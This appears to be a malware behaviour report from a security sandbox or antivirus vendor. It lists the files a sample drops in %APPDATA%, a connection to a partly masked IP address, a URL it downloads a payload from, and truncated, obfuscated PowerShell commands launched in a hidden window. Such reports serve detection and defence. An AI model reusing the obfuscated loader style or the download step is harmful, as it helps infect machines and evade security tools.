Technical Information
- %APPDATA%\bit3d9c.tmp
- %APPDATA%\bit8ec8.tmp
- %APPDATA%\bit3d9c.tmp
- %APPDATA%\bit8ec8.tmp
- from %APPDATA%\bit3d9c.tmp to %APPDATA%\incurable.res
- from %APPDATA%\bit8ec8.tmp to %APPDATA%\incurable.res
- '85.##9.176.46':80
- http://85.##9.176.46/Langturschauffrernes.jpb
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "dir;Function Snnesnner9 ($Constitutionalist){$Bot71=5;$Bot71++;For($Kommutere=5; $Kommutere -lt $Constitutionalist.Length-1; $Kommutere+=$Bot71){$Gruberne = 'sub' + 'string';$Pentathionate=$C...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "dir;Function Snnesnner9 ($Constitutionalist){$Bot71=5;$Bot71++;For($Kommutere=5; $Kommutere -lt $Constitutionalist.Length-1; $Kommutere+=$Bot71){$Gruberne = 'sub' + 'string';$Pentathionate=$C...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "dir;Function Snnesnner9 ($Constitutionalist){$Bot71=5;$Bot71++;For($Kommutere=5; $Kommutere -lt $Constitutionalist.Length-1; $Kommutere+=$Bot71){$Gruberne = 'sub' + 'string';$Pentathionate=$C...